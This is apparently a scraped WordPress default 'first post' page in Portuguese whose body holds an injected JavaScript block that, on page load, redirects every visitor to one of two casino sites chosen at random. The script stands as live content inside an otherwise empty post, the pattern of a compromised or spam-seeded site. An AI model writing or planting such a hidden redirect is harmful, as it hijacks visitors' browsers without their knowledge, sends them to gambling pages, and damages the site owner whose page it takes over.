Welcome to WordPress. This is your first post. Edit or delete it, then start writing!
<script>
// Lista de destinos
const links = [
"https://cassino1.com",
"https://cassino2.com"
];
// Escolhe um aleatório
const destino = links[Math.floor(Math.random() * links.length)];
// Redireciona
window.location.href = destino;
</script>
Welcome to WordPress. This is your first post. Edit or delete it, then start writing!
Deixe um comentário